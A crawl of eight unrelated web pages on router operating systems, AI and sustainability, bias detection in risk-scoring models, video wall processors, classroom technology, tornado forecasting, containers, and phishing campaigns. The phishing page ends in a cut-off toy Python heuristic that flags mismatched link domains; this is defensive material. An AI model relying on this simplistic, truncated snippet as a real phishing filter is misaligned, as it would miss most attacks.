The router operating system is a piece of software responsible for managing the router's resources by controlling and allocating memory, prioritizing system requests and processes, controlling I/O devices and managing file systems. The two most famous router operating systems are Cisco IOS and Juniper JUNOS. Cisco IOS is a monolithic OS, which means it runs as a single image with all processes sharing the same memory space. This means a bug in one process can impact or corrupt other processes; it also means that adding new features to the OS requires upgrading the full IOS image itself. JUNOS is a modular operating system with a FreeBSD-based kernel. All processes run in separate modules and protected memory spaces. This modularity enhances the router's uptime because bugs will not affect the entire operating system, and new features can be added without disabling the operating system or requiring a full upgrade. Cisco is actually overcoming these limitations by introducing new modular versions of IOS, like IOS XR and IOS XE, that are based on dedicated kernels. Both operating systems are almost identical in the normal processes and features that are based on technology standards. That's all for today. Please share your comments, ideas or questions.
<urn:uuid:2e79521b-3cce-4e23-ae2f-45e033632f36>
CC-MAIN-2022-40
https://www.networkers-online.com/blog/2008/07/routers-operating-systems/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00651.warc.gz
en
0.936346
248
2.96875
3
Artificial Intelligence already impacts many of our daily activities. Whether you are asking Siri for directions, getting recommendations on what to watch on Amazon Prime or Netflix, or even receiving a fraud alert from your bank, all of these experiences are curated by AI. This machine learning technology already has an impact, and continues to do so, in education, healthcare, human resources, marketing, and banking, among other fields. But can AI help with sustainability? What about climate change? Can AI technologies really be deployed to help transform the only planet we live on, protecting the environment and biodiversity? Can this technology embrace going green? The answer is a big YES. AI shapes our present and will certainly keep doing so in the future. In the words of Andrew Ng, a computer scientist and Coursera co-founder, AI is the new electricity. Ng explains that AI will transform every industry in the next several years just as electricity transformed everything 100 years ago. "I actually have a hard time thinking of an industry that I don't think AI will transform in the next several years," Ng points out. Without doubt, AI has grown sharply in scope and application, and it is estimated that by 2030, AI will contribute up to $15.7 trillion to the global economy. In addition, applying AI levers globally could in parallel reduce worldwide GHG emissions by up to 4.0% in 2030, an amount of 2.4 Gt CO₂e, equivalent to the 2030 annual emissions of Australia, Canada and Japan combined.
We need to create a safer and more conscientious future
In this scenario, environmental sustainability becomes a critical issue and its protection has become a serious consideration across countries. Climate change, rising pollution levels, and high carbon emissions are among the battles we are facing, and it's imperative that we take concrete steps to protect the planet. Today, not only the tech world but also the business world is debating the importance of artificial intelligence for a more sustainable future. We all need to work on transforming industries, markets, and behaviors to change the course of climate change and create a safer and more conscientious digital future. Moreover, although we might think that artificial intelligence is a few years away from showing any real impact, the fact is that this is already happening, and we must work on better ways to look after our environment. Therefore, AI may be a good ally in enhancing sustainability, helping to build a better and greener world for all of us. In this article, we'll explore how AI may be a game changer for environmental issues.
AI is making the energy industry greener
Renewable energy generation is growing rapidly, and this transition to low-carbon energy systems is using AI to predict the demand and supply of energy, improve storage and assist in its efficient use. According to the latest report from a United Nations climate panel, between 3.3 billion and 3.6 billion people – more than 40% of the world's population – live in places and in situations that are "highly vulnerable to climate change". So taking action on this topic is essential. AI has the potential to reshape the renewable energy industry completely, swapping daily tasks for more sustainable, eco-friendly alternatives that reduce the effect we have on our environment. For example, AI is used to better forecast the short- and long-term energy needs of an area, including prediction of weather conditions to manage fluctuations.
AI and smart cities: from controlling traffic and waste to environmental issues
According to the United Nations Department of Economic and Social Affairs, 55% of the world's population lives in urban areas. This is expected to rise to 68% by 2050. Apart from that, a study by McKinsey found that technology can lead to improvements in certain key quality of life indicators by 10-30%. That is why some cities are already working on making more sustainable environments for those living there. By using AI technologies, smart cities are able to control traffic, waste, and maintenance, as well as predict energy consumption, pollution risks, and effects on the environment. For instance, AI is used to monitor and optimize traffic flows in real time, reduce queuing, and enforce real-time smart pricing for vehicle tolls. Another improvement AI brings to our daily lives in the city has to do with identity verification technologies. Biometric solutions mean better management of data as well as paperless, energy-saving workplaces. Did you ever stop and think how much plastic, paper, ink, and energy is consumed by producing, for example, health insurance cards or rewards cards? Or the pollution levels involved in traveling to and from work? Biometrics not only helps reduce our environmental footprint but also offers a secure alternative that saves resources and adds security layers to every action we take online. Biometrics gives users the ability to prevent data leaks, protect devices, reduce fraud, and streamline employee processes, in addition to enabling more efficient customer service, supporting remote work, and offering users effective protection against threats.
AI for better and more accurate agriculture
Based on the United Nations' prediction data on population and hunger, a 60% increase in food productivity will be needed to feed the world's population. In the U.S. alone, growing, processing and distributing food is a $1.7 trillion business, according to the U.S. Department of Agriculture's Economic Research Service. This makes AI an important partner for agricultural services. AI can help transform production by better monitoring and managing environmental conditions and crop yields. This technology may be an ally in detecting crop disease, pests, and poor nutrition on farms. AI can spot and target weeds and then decide which herbicide should be applied, helping reduce herbicide usage and save costs. AI robotics can also be programmed to carry out agricultural tasks autonomously, such as an autonomous tractor picking fruit only when it is ripe.
AI can help predict extreme weather conditions at a glance
Reliable forecasts can predict hazardous weather, such as hurricanes, flooding and high winds, 9 to 10 days before the event occurs. These technology-based forecasts can play a critical role for many industries, including water conservation, energy demand, and disaster preparedness. Accurate predictions and data on extreme weather conditions give communities and essential sectors more time to prepare for and mitigate potential disasters.
AI: a good partner for biodiversity conservation
For conservation specialists and biologists, AI offers an alternative to manually processing huge amounts of species data. The process of collecting and identifying data on different species and organisms is tiresome and really time-consuming. However, algorithms could significantly reduce this time.
On the other hand, experts can make crucial decisions about future biodiversity management by using artificial intelligence to learn from past environmental change. Another clear example has to do with illegal deforestation. According to FAO, between 2015 and 2020, the rate of deforestation was estimated at 10 million hectares per year. The area of primary forest worldwide has decreased by over 80 million hectares since 1990. AI can analyze satellite data or ground-based sensors to monitor forest conditions in real time and at scale, providing early warning systems for priority investigation and pattern analysis. The examples go on and on. Nowadays there is a wide variety of AI-based machine learning developments empowering us to better manage the impacts of climate change and protect the environment. Artificial intelligence can help tackle some of the world's biggest problems, but although it may be of great use, it also needs to be supported by the necessary regulatory oversight. To ensure these technologies reach their potential and can start helping countries grow their economies, we need governments, educators, technologists and businesses to work together on regulations and laws that keep pace with technology. We need to work on ensuring an earth-friendly AI that can bring real solutions to environmental issues and create a healthier and greener future. So sustainability is possible with AI, and so is fighting climate change. It's up to us to create room for the positive innovation that AI can bring with the right regulations and support. Each of us has a role to play; let's start now.
<urn:uuid:3c237e85-0277-4bee-9ff1-10793782d453>
CC-MAIN-2022-40
https://hummingbirds.ai/why-is-ai-an-ally-to-empower-a-greener-future/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00651.warc.gz
en
0.944819
1,645
3.375
3
A new paper on so-called 'black-box' AI models reveals the dangers of our increasing dependence on opaque systems – and offers up a method for combating prejudiced AI. Just last week, we reported on the UK Financial Stability Board's warning that the use of AI and machine learning could compound any future financial crisis. Now, research published on the preprint repository arXiv has highlighted another harmful aspect of our dependency on automated risk assessment. In short, it could be prejudiced, to harmful effect. Black-box risk scoring AIs can be found throughout our financial and criminal justice systems. They are adept at processing vast quantities of data to determine whether an individual meets the desired risk criteria to qualify for a loan or be granted bail. Through machine learning, such systems evolve over time, identifying trends and making associations within the information they're processing.
Are we making AIs prejudiced?
However, these AIs are only as capable as their models (and the data they are fed) permit them to be. While it is usually illegal to consider factors such as race in these cases, black-box AIs are typically opaque in their methods. Algorithms can recognize that education levels or addresses correlate with other demographic information. The institutions using them either don't fully understand their AI's methods or are using proprietary products, the workings of which suppliers refuse to divulge. There is a very real danger that the limited data sets and methods used by these systems are resulting in unethical bias. This latest report, Detecting Bias in Black-Box Models Using Transparent Model Distillation, is led by Sarah Tan of Cornell University and provides the means to rid our AIs of prejudice. Model distillation is a method of compressing the knowledge of a complex model, or of an ensemble of models trained on the same data, into a simpler one. The output of these 'teacher models' is distilled into a faster, simpler 'student model', without significant loss of accuracy.
How can we better understand AI?
Tan's method differs in that it uses two labels to train the AI – a risk score and the actual outcome the risk score was intended to predict. Her team has outlined how these labels relate to each other in a way that reveals bias. They achieve this by assessing whether contributions of protected features to the risk score are statistically different from contributions to the actual outcome. In the past, more transparent models such as this have resulted in reduced prediction accuracy – creating tension between less transparent but more accurate models and clearer but less precise solutions. When the decision could determine whether an individual is granted bail or a loan, it's a tricky choice with high-stakes implications. This latest development allows users of black-box AIs to retrain them with the actual outcomes. "Here, we train a transparent student model to mimic a black-box risk score teacher. We intentionally include all features that may or may not be originally used in the creation of the black-box risk score, even protected features, specifically because we are interested in examining what the model learns from these variables," describes the report.
“Then, we train another transparent model to predict the actual outcome that the risk score was intended to predict.” In other words, the black-box risk score (such as a credit score) is compared to the actual outcome (whether a loan defaulted). Any systematic differences between the risk scoring model and the actual outcome are then identified as bias – those variables from the initial data set that weren’t factors in the outcome. Tan and her colleagues trialed the method on loan risks and default rates from the peer-to-peer company LendingClub. It identified that the lender’s current model was probably also ignoring the purpose of the loans for which it was calculating risk – an important variable that has been proven to correlate with risk. They also tested their model against COMPAS, a proprietary score that predicts recidivism risk in the area of crime (and the subject of scrutiny for racial bias). Its proponents argue that it is race-blind – that is, not prejudiced – as it doesn’t use race as an input. However, ProPublica previously analyzed and released data on COMPAS scores and true recidivism outcomes of defendants in Broward County, Florida. They found that, “black defendants who did not recidivate over a two-year period were nearly twice as likely to be misclassified as higher risk compared to their white counterparts (45 percent versus 23 percent).” Tan’s model was able to back this up by demonstrating biases against certain age groups and races within COMPAS, while its own model, trained on the true outcomes, showed no evidence to support this. With further testing and development, Cornell University’s solution could serve to please everyone – from the institutions that employ AI, to the individuals that must live by their conclusions. Most importantly, it introduces transparency to critical AI models, while retaining accuracy. As we become ever more dependent on AI, across all walks of life, it’s vital that we understand how they reach conclusions – or we risk blind acceptance of prejudiced decisions.
<urn:uuid:4bf3f070-3890-49dc-8364-b524317c5800>
CC-MAIN-2022-40
https://internetofbusiness.com/research-reveals-dangers-prejudiced-ai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00651.warc.gz
en
0.946759
1,099
2.984375
3
Control room operators typically need to monitor large amounts of information and interact with mission-critical systems. This often requires simultaneously presenting the operator with multiple video or HMI sources. In some environments, desktop monitors and a single large-screen display may be sufficient; in other environments, a large-scale video wall with multiple screens may be required to better support situational awareness across multiple operators. There are essentially two ways to create a multi-window visual environment in a control room – with a multi-viewer or a video wall processor. Multi-viewers are generally purpose-built devices with embedded operating systems for viewing multiple windows on a single display. The number of windows typically ranges from 4-12. In the broadcast industry, multi-viewers scale to even more windows, but are more specialized in their video inputs and also display things like audio meters and advanced labelling. These broadcast-specific multi-viewers are not the subject of comparison to video wall processors here. A typical desktop multi-viewer will contain four images, and ones used on larger displays might use more. Multi-viewers can be connected to any type of display device, including projectors, to create a single large, multi-window image. Since multi-viewers can display multiple windows, most support various types of layouts such as quadview, picture-in-picture, and windowed, and the window sizes can sometimes be adjusted as desired by the operator. Some advanced multi-viewers also support keyboard and mouse functionality so that the operator can have full KVM control of multiple sources displayed on a single screen, and some also might have more physical inputs than supported output windows, which allows for a limited switching type of function. Multi-viewers generally support external control through either a serial or Ethernet interface to make basic operation easy through a push-button or touchpad device. A growing trend is for multi-viewers to also directly decode H.264 streams.
Video Wall Processors
Control room video wall processors behave similarly to multi-viewers in creating a multi-window display, but are designed to create that output across a range of multi-display combinations such as 1x4, 2x3, 4x5, etc. Smaller-scale video wall processors are generally designed around embedded operating systems, while most of the large-scale video wall processors are designed around Windows platforms. IP-based platforms are also based on embedded operating systems. Centralized video wall processors are generally based on adding cards to one or more system chassis, while distributed, IP-based processors are based on having one transmitter per source and one receiver per display. Either architecture can provide a highly scalable solution. Control room video wall processors support having essentially an unlimited number of windows based on practical viewing size, not just a pre-defined limit (i.e. 4-12) as is the case with multi-viewers. While video wall processors can also be controlled through an external control API by push-button and touchpad controllers for switching layouts and content sources, there is typically a separate user interface for managing the system that is more capable than an external control device. The software interface can support various levels of permissions, with some advanced system options being limited to administrators, and with users only controlling the video wall with external control devices.
Multiple video walls can also be administered from a single system. Content sources can be duplicated multiple times inside the processor and displayed in different windows simultaneously with different parameters such as cropping, frame rate, color hue, etc. This enables subsets of content from a single source to be viewed in separate windows or on separate video walls. The larger-scale systems also have the capability to receive H.264 streams from hundreds of video cameras. And with so many sources to potentially view, content carousels can be configured to create groups of content that are rotated inside of a window with preset rotation timing between each source. In order to eliminate content gaps when displaying the next camera in the sequence, simultaneous decoding is performed on the active and next stream. In addition to user permission levels, some control room video wall processors also support activity logging to capture changes to the wall such as user log-ins, parameter configuration changes, layout changes, source switching, and more.
General Comparison of Control Room Multi-viewers and Video Wall Processors
|Attribute||Multi-viewer||Video Wall Processor|
|# of windows||Typically 4-12||Essentially unlimited, based on practical viewing size|
|Multiple wall control||No (drives a single display)||Yes, multiple walls administered from a single system|
|Operating system||Embedded||Windows or embedded|
|External control interface||Serial or Ethernet||External control API plus dedicated management software|
|Architecture||Single purpose-built device||Single- or multi-chassis, or distributed (IP)|
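As an illustration only, external control of either class of device from a script often amounts to sending short commands over the serial or Ethernet control interface. The sketch below is hypothetical: the IP address, port, and command keywords are invented for the example and will differ for every vendor, so consult the product's control protocol documentation:

    CONTROLLER=192.168.10.50   # processor's control IP (assumption)
    PORT=4999                  # vendor control port (assumption)

    # Recall a saved layout, then route source 7 into window 2
    # (command keywords are made up for illustration):
    printf 'LOAD_LAYOUT 3\r\n'         | nc -w 2 "$CONTROLLER" "$PORT"
    printf 'SET_WINDOW 2 SOURCE 7\r\n' | nc -w 2 "$CONTROLLER" "$PORT"

In practice these commands would be wired to the push-button or touchpad controllers described above rather than typed by the operator.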
<urn:uuid:35ea4944-2842-4860-b73e-02743a8e6a14>
CC-MAIN-2022-40
https://www.blackbox.com/en-be/insights/blogs/detail/technology/2017/01/10/key-considerations-for-choosing-a-control-room-multi-window-display-solution
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00651.warc.gz
en
0.903531
992
2.53125
3
Part 1: Move beyond the technology
In honor of this week's ISTE conference — a premier education technology conference in San Antonio, TX — I want to discuss how schools, educators and IT can provide students with the best conditions for success. It's not about the technology. This defiant mantra is still prevalent in education. But why? While learning should be the leading driver for all discussions and decisions that impact student success, the topic of technology continues to taint our conversations. In order to support the individual needs of all learners, we must spend our time and resources wisely – not letting technology limit us or drive our decisions. Instead, we should allow the technology, specifically the device, to be a conduit that enables learning, embracing the fact that it's an important tool in education. So why is there so much debate on this topic? Going back in time 20 years, we saw a very different picture. There was minimal discussion on technology in education. As we progressed through the years, people were willing to accept small steps forward as big improvements on this front. For instance, a teacher presenting material from their computer onto a screen was, by some, seen as notable technological progression in the classroom. The teacher-centered lecture model of technology had a new spin, yes, but it was the same old model. There are ways to take bigger, more impactful steps. Frameworks that could aid in this movement, like ACOT and TPACK, have been around a while. And in the early 2000s, LoTi, SAMR, 4Cs and TIMs emerged as evaluation models for technology integration. They shifted the focus to student-centered, high-level thinking. Now, with these powerful tools, we can move the discussion forward and reevaluate the main drivers of learning.
Get past the limits of a technology
Regardless of your current platform, or what you may adopt in the future, I suggest using an evaluation tool comparable to SAMR. By using rubrics that insist on the potential of the technology you implement, you can better understand the effect it has on learning. For instance, the founder of SAMR, Dr. Ruben R. Puentedura, believes in moving learning from simple substitution and augmentation to use cases that apply modification and redefinition of former practices. When it comes to implementing new technology, it's important to fully evaluate how it will live in the classroom. Will your model meet each individual student's needs? And will it grow with students as their maturity and knowledge base expand? As with SAMR, improving the technology implementation in your environment could consist of mass customization and an agile approach to moment-by-moment adjustments. Think of linking digital citizenship programs to students' privileges on their devices. Instead of granting all students the same permissions, consider providing access to different applications or resources based on their actions. Support your digital equity efforts by focusing on customized learning environments for all students. With all of this in mind, let's start a new discussion around technology that focuses on promoting measured progress and a gradual transformation, all while also tending to students' dynamic needs.
<urn:uuid:f85c280f-0ddb-456f-b505-bc74decd59ab>
CC-MAIN-2022-40
https://www.jamf.com/blog/creating-the-conditions-for-student-success-part-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00651.warc.gz
en
0.93808
691
2.9375
3
When tornadoes touched down in Kentucky, Illinois, Arkansas, Missouri, Mississippi, and Tennessee over the weekend, residents and staff had only 20 minutes of warning. More than 70 people are known to have died, but the death toll is expected to climb as first responders search the 200-mile-long path of the outbreak. Still, that's about the typical amount of warning for a major tornado, which is forecast 18 minutes before touching down. Tornadoes form alongside thunderstorms. But a thunderstorm only spins off a tornado under very particular conditions. Wind at the ground and farther above needs to be moving in opposite directions. This causes the air between to spin in a horizontal tube. Then, the air at the ground must be warm enough to tip that spinning tube off the ground. And the storm above needs to tug on the top of the now-vertical column, which allows it to grow. The central challenge with predicting a tornado's path is that the weather events are extremely local phenomena. Though Friday's tornadoes moved more than 200 miles, they were less than a mile wide. The typical width of a tornado, according to the Federal Emergency Management Agency, is just around 400 yards, which is less than a quarter of a mile, or about four football fields. (That may sound large, but hurricanes, which are more easily predicted, are often around 300 miles wide.) Weather forecasting models typically look at phenomena over square miles, and Wired reported in 2019 that advanced tornado modeling only went down to about 2-mile increments. That means forecasters can predict the conditions where tornadoes are able to form (particular storms, like supercells and hurricanes, are most likely to spin them off), but they are much less good at understanding where they will touch down. Figuring out where they will move is another gap. The speed of the storm, along with the lack of data on upper atmospheric conditions that affect the path of the tornado, makes it hard to guess what will happen once it has formed. So forecasters must weigh false positives against false negatives. In about 70 percent of tornado warnings between 2016 and 2020, no tornado appeared, according to data reported by Weather.com. (Watches are issued when the conditions look right for a vortex, while warnings are issued when forecasters believe one is imminent.) And since it's so hard to know precisely where a tornado will move after it touches down, few people in a warning zone will actually be near its eventual path. Nonetheless, forecasters are pretty successful at predicting the worst events. A 2019 study found that 87 percent of deadly tornadoes were forecast in advance, and 95 percent of deaths took place in areas with active tornado warnings. Predicting how powerful a tornado will become is hard, too. Tornado watches merely say that something is coming, but don't distinguish between a brief tornado with 100 mph winds and a monster that can obliterate buildings. "With hurricanes, communities will take different actions depending on whether a Category 1 versus a Category 5 storm is in the forecast," atmospheric scientist Joshua Wurman wrote in a CNN essay on Sunday.
"But with tornadoes, no such detail exists, and people might become complacent about warnings, having experienced false alarms." In the case of this past weekend's storm, the death toll appears to be highest where employers didn't act on the information they were given. And notably, NBC reported this afternoon that workers at a candle factory in Mayfield, Kentucky, were told that they'd be fired if they left early to take shelter. (Company spokespeople dispute the account.) At least eight people died when the factory was destroyed. Insider reported a similar story at an Amazon warehouse in Edwardsville, Illinois. Six people died there on Friday night. So while there are many false alarms, predictions are good enough to let people know that they're at risk. Decision makers must be prepared to act on that information.
<urn:uuid:b30c7fc3-35a7-48e4-aff9-929ce9d41a35>
CC-MAIN-2022-40
https://dimkts.com/why-its-so-difficult-to-forecast-a-tornados-path/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00051.warc.gz
en
0.948391
881
2.9375
3
What are the Benefits of Containerization?
Containers are rapidly being adopted by organizations worldwide. According to Research and Markets, over 3.5 billion applications are currently running in Docker containers, and 48% of organizations are managing containers at large scale with Kubernetes. Containers have compelling advantages over the previous generation of virtualization technology. They are faster, more lightweight, and easier to manage and automate than virtual machines (VMs), and are phasing out VMs in many common scenarios. We'll discuss the advantages of containers over VMs, compelling reasons to start using containers, and key requirements for successfully adopting containers in your organization.
Containers vs Virtualization
Let's briefly review the differences between traditional virtualization and containerization, to understand the compelling advantages of containers and the reasons for their rapid adoption.
What is the Difference Between Virtual Machines and Containers?
Virtual machines (VMs), pioneered by VMware over two decades ago, are used by most large enterprises to build a virtualized computing environment. A virtual machine is an emulation of a physical computer. VMs make it possible to run several operating systems on one server, dramatically improving resource utilization of enterprise applications. VMs are managed by a software layer called a hypervisor, which isolates VMs from each other and allocates hardware resources to each VM. Each VM has direct or virtualized access to CPU, memory, storage, and networking resources. Each virtual machine contains a full operating system with applications and associated libraries, known as a "guest" OS. There is no dependency between the VM and the host operating system, so Linux VMs can run on Windows machines, and vice versa. A container is an isolated unit of software running on top of an operating system (usually Linux or Windows). Unlike virtual machines, containers only run applications and their dependencies. Containers do not need to run a full operating system on each instance—rather, they share the operating system kernel and gain access to hardware through the capabilities of the host operating system. This makes containers smaller, faster, and more portable. Like virtual machines, containers allow developers to increase CPU and memory utilization on physical machines. However, containers take it a step further. Related content: read our guide to Docker architecture ›
Use Cases in Which Containers are Preferred to Virtual Machines
Here are three main scenarios in which containers provide compelling advantages compared to virtual machines:
- Microservices—containers are highly suitable for a microservices architecture, in which applications are broken into small, self-sufficient components, which can be deployed and scaled individually. Containers are an attractive option for deploying and scaling each of those microservices.
- Multi-cloud—containers provide far more flexibility and portability than VMs in multi-cloud environments. When software components are deployed in containers, it is possible to easily "lift and shift" those containers from on-premise bare metal servers, to on-premise virtualized environments, to public cloud environments.
- Automation—containers are easily controlled by API, and thus are also ideal for automation and continuous integration / continuous deployment (CI/CD) pipelines.
7 Reasons to Adopt Containers in Your Organization
Portability – Ability to Run Anywhere
Containers can run anywhere, as long as the container engine supports the underlying operating system—it is possible to run containers on Linux, Windows, macOS, and many other operating systems. Containers can run in virtual machines, on bare metal servers, or locally on a developer's laptop. They can easily be moved between on-premise machines and public cloud, and across all these environments, continue to work consistently.
Resource Efficiency and Density
Containers do not require a separate operating system and therefore use fewer resources. VMs are typically a few GB in size, but containers commonly weigh only tens of megabytes, making it possible for a server to run many more containers than VMs. Containers require less hardware, making it possible to increase server density and reduce data center or cloud costs.
Container Isolation and Resource Sharing
You can run multiple containers on the same server, while ensuring they are completely isolated from each other. When containers crash, or applications within them fail, other containers running the same application can continue to run as usual. Container isolation also has security benefits, as long as containers are securely configured to prevent attackers from gaining access to the host operating system.
Speed: Start, Create, Replicate or Destroy Containers in Seconds
A container is a lightweight package that contains everything an application needs to run: code, dependencies, and libraries. You create a container image and then deploy a container in a matter of seconds. Once you have the image set up, you can quickly replicate containers and deploy them as needed. Destroying a container is also a matter of seconds. The lightweight design of containers ensures that you can quickly release new applications and upgrades like bug fixes and new features. This often leads to a quicker development process and speeds up the time to market as well as operational tasks. Containers make it easy to horizontally scale distributed applications. You can add multiple, identical containers to create more instances of the same application. Container orchestrators can perform smart scaling, running only the number of containers you need to serve application loads, while taking into account resources available to the container cluster.
Improved Developer Productivity
Containers allow developers to create predictable runtime environments, including all software dependencies required by an application component, isolated from other applications on the same machine. From a developer's point of view, this guarantees that the component they are working on can be deployed consistently, no matter where it is deployed. The old adage "it worked on my machine" is no longer a concern with container technology. In a containerized architecture, developers and operations teams spend less time debugging and diagnosing environmental differences, and can spend their time building and delivering new product features. In addition, developers can test and optimize containers, reducing errors and adapting them to production environments. Related content: read our guide to Docker in production ›
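To make the speed and replication claims above concrete, here is a small, hedged Docker CLI walk-through. The image name and tag are placeholders, and it assumes Docker is installed and the current directory contains a Dockerfile:

    # Build an image once...
    docker build -t myapp:1.0 .

    # ...then start, replicate, and destroy containers in seconds:
    docker run -d --name myapp-1 myapp:1.0
    docker run -d --name myapp-2 myapp:1.0    # an identical replica
    docker ps --filter name=myapp
    docker rm -f myapp-1 myapp-2

    # Rough feel for startup overhead (assumes the image contains /bin/true):
    time docker run --rm myapp:1.0 /bin/true

The same image can be pushed to a registry and run unchanged on a laptop, a bare metal server, or a cloud VM, which is the portability point made earlier.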
Break your components into fine-grained independent units. You should be able to design, deploy, scale, and maintain each unit independently.|
|Prefer disposable components||When possible, design and build stateless and lightweight containers. This enables the orchestration platform to easily monitor and handle the container life cycle. However, if you do need to run stateful applications, you can do so using StatefulSets.|

Security and Orchestration
|Implement container security||It is critical to implement security measures and policies across the entire container environment, which includes container images, containers, the hosts, registries, runtimes, and your orchestrator. For example, use secrets to protect sensitive data and harden your environment.|
|Leverage container orchestrators||Deploying containerized applications in production involves deploying, running, and managing a massive number of containers—sometimes thousands, sometimes tens or hundreds of thousands. To efficiently manage containers, you need a container orchestration platform that provides automation and management capabilities for tasks like deployment, scaling, resource provisioning, and more. A popular open source option is Kubernetes (a minimal automation sketch follows this checklist).|

Automation and Efficiency
|Automate your pipeline||In addition to automating the orchestration of containers, you can also automate your entire development pipeline—or as many aspects of it as possible. Automation can help you quickly iterate and make any necessary changes. For this purpose, you can leverage a container orchestration platform as well as other tools that integrate well together.|
|Infrastructure as Code (IaC)||IaC lets you define various aspects of the infrastructure in declarative files, which are used to automate the process. Container platforms often provide IaC capabilities that let you define the environment and turn it into the codebase. There are also tools that are dedicated to providing IaC capabilities for certain phases of the development pipeline, like security or resource optimization.|
|Practice agile development||Agile methodologies help teams improve the development lifecycle by making it more efficient and breaking through silos. For example, DevOps, which stands for development and operations, helps ensure that development and operational tasks are handled quickly and effectively. This can significantly help teams that build and manage containerized environments.|
|Promote a self-service developer experience||Teams should be able to independently provision their projects. This means collaborators need control over resources like code repositories and compute power, automation features, and access to image repositories. When providing access and privileges, be sure to use granular permissions.|
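As a concrete companion to the "leverage container orchestrators" and "automate your pipeline" items, here is a minimal sketch using the official Kubernetes Python client to scale a deployment through the API. The deployment name, namespace, and replica count are illustrative assumptions, not values from the checklist.

```python
# Minimal sketch: scaling a Kubernetes Deployment through the API instead of by hand.
# Assumes the "kubernetes" Python client is installed and a kubeconfig is available.
# The deployment name, namespace, and replica count are hypothetical examples.
from kubernetes import client, config

config.load_kube_config()          # use local kubeconfig credentials
apps = client.AppsV1Api()

# Scale the (hypothetical) "web" deployment in the "shop" namespace to 5 replicas.
apps.patch_namespaced_deployment_scale(
    name="web",
    namespace="shop",
    body={"spec": {"replicas": 5}},
)

# List deployments and their ready/desired replica counts.
for dep in apps.list_namespaced_deployment(namespace="shop").items:
    print(dep.metadata.name, dep.status.ready_replicas, "/", dep.spec.replicas)
```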
<urn:uuid:4bce0635-1529-4684-967a-6e56101483f9>
CC-MAIN-2022-40
https://www.aquasec.com/cloud-native-academy/docker-container/container-advantages/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00051.warc.gz
en
0.917994
1,875
3.078125
3
A phishing campaign is an email scam designed to steal personal information from victims. Cybercriminals use phishing, the fraudulent attempt to obtain sensitive information such as credit card details and login credentials, by disguising themselves as a trustworthy organization or reputable person in an email communication. Typically, a phishing campaign is carried out by email spoofing; an email directs the recipient to enter personal information at a fake website that looks identical to the legitimate site. Phishing emails are also used to distribute malware and spyware through links or attachments that can steal information and perform other malicious tasks.

Phishing is popular with cybercriminals because it enables them to steal sensitive financial and personal information without having to break through the security defenses of a computer or network. Public awareness about phishing campaigns has grown considerably in recent years, as many incidents have been covered by a variety of media sources. In addition to technical solutions, user security awareness is one of the cyber security measures being used to help counter attempted phishing incidents.

How a Phishing Campaign Works

A phishing campaign uses social-engineering techniques to lure email recipients into revealing personal or financial information. For example, during the holidays, an email pretending to be from a well-known company tells you to go to its website and re-enter your billing information or your package won't be shipped in time to make it to your gift recipient. The only problem is that the fake email is directing you to a fake site, where the information you enter will be used to commit identity theft, fraud and other crimes.

Types of Phishing Campaigns

As businesses continue to deploy anti-phishing strategies and educate their users about cyber security, cybercriminals continue to improve phishing attacks and develop new scams. Here's more information about some of the most common types of phishing campaigns.

Spear phishing attacks are targeted at an individual or small group, typically with access to sensitive information or the ability to transfer funds. Cybercriminals gather information about the intended target in advance and leverage it to personalize the attack, create a sense of familiarity and make the malicious email seem trustworthy. Spear-phishing emails typically appear to come from someone the target knows, such as a co-worker at their company or another business in their network. Whaling is a spear-phishing attack that specifically targets senior executives at a business.

Vishing, or voice phishing, uses a telephone message to try to get potential victims to call back with their personal information. Cybercriminals often use fake caller-ID information to make the calls appear to be from a legitimate organization or business. Smishing, also known as SMS phishing, uses text messages to try to lure victims into revealing account information or installing malware.

While spam filters and other technology solutions can help prevent phishing emails from reaching inboxes, educating users about the dangers of phishing campaign emails is a critical component of cyber security for any organization. User security awareness training helps every employee recognize, avoid, and report potential threats that can compromise critical data and systems.
As part of the training, mock phishing and other attack simulations are typically used to test and reinforce good behavior.

- White Paper: Best Practices for Protecting Against Phishing, Ransomware and Email Fraud
- White Paper: Comprehensive Email Protection
- Security Trend: Email Security Trends Special Report

How Barracuda Can Help

Barracuda Email Protection is a comprehensive, easy-to-use solution that delivers gateway defense, API-based impersonation and phishing protection, incident response, data protection, compliance and user awareness training. Its capabilities can help prevent phishing attacks:

Barracuda Impersonation Protection is an API-based inbox defense solution that protects against business email compromise, account takeover, spear phishing, and other cyber fraud. It combines artificial intelligence and deep integration with Microsoft Office 365 into a comprehensive cloud-based solution. Its unique API-based architecture lets the AI engine study historical email and learn users' unique communication patterns. It blocks phishing attacks that harvest credentials and lead to account takeover, and it provides remediation in real time.

Barracuda Security Awareness Training helps your business fight phishing and other social-engineering attacks by providing users with continuous simulation and training to understand the latest attack techniques, recognize subtle clues and help stop email fraud, data loss and brand damage.

Have questions or want more information about phishing campaigns? Get in touch right now!
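The lure described above, a message whose visible link text points somewhere other than its real destination, can be illustrated with a small heuristic check. The sketch below is not part of any Barracuda product; the regular expression, the example message body, and the rule itself are simplified assumptions for illustration only.

```python
# Toy heuristic sketch: flag links in an email body whose visible text and actual
# target domain disagree, a common phishing tell. Not a production filter.
import re
from urllib.parse import urlparse

# Hypothetical example body; a real system would parse the full MIME message instead.
BODY = '<a href="http://shipping-update.example-parcel.co">www.well-known-courier.com</a>'

LINK_RE = re.compile(r'<a\s+href="([^"]+)"\s*>([^<]+)</a>', re.IGNORECASE)

def suspicious_links(html_body: str):
    findings = []
    for href, text in LINK_RE.findall(html_body):
        target = urlparse(href).hostname or ""
        shown = text.strip().lower().removeprefix("www.")
        # If the visible text looks like a domain but doesn't match the real target, flag it.
        if "." in shown and shown not in target:
            findings.append((text.strip(), target))
    return findings

for shown, real in suspicious_links(BODY):
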